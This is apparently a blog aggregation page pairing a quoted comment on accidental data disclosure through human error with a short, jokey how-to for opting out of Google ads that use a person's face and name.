“If we consider accidental disclosure of information through human error, for example, the Prism issue is starting to look relatively palatable.

“Human error can cause huge fines from the authorities and public reputation damage – it can easily occur and have a severe impact on future information sharing,” he said.

Via: computerweekly

How To Opt Out Of Google’s Weird New Ads That Use Your Face And Name

Angry that Google is planning on using your face and name for the sake of advertisements?

Here’s how to make them not.

If there’s any upside, it’s that opting out is, quite seriously, two clicks away. Two clicks that I only discovered because I went out of my way to look and because I checked the depths of Google+ (lol). But hey — it’s two clicks from somewhere.

Here’s how to do it

  1. Click this link. (And, if necessary, log in to the Googles. I promise that’s a link to actual Google, not fake Google that steals your password and uses it to order handbags.)
  2. Uncheck the checkbox. Unless it’s already unchecked — in which case, leave it unchecked. Oddly, some people are saying they’re opted out by default; others say they find it checked. tl;dr: check = bad.
  3. Hit save!

And you’re done*.

[* Until there’s another TOS change, in which case, get ready for another rousing game of find the checkbox!]

Via: techcrunch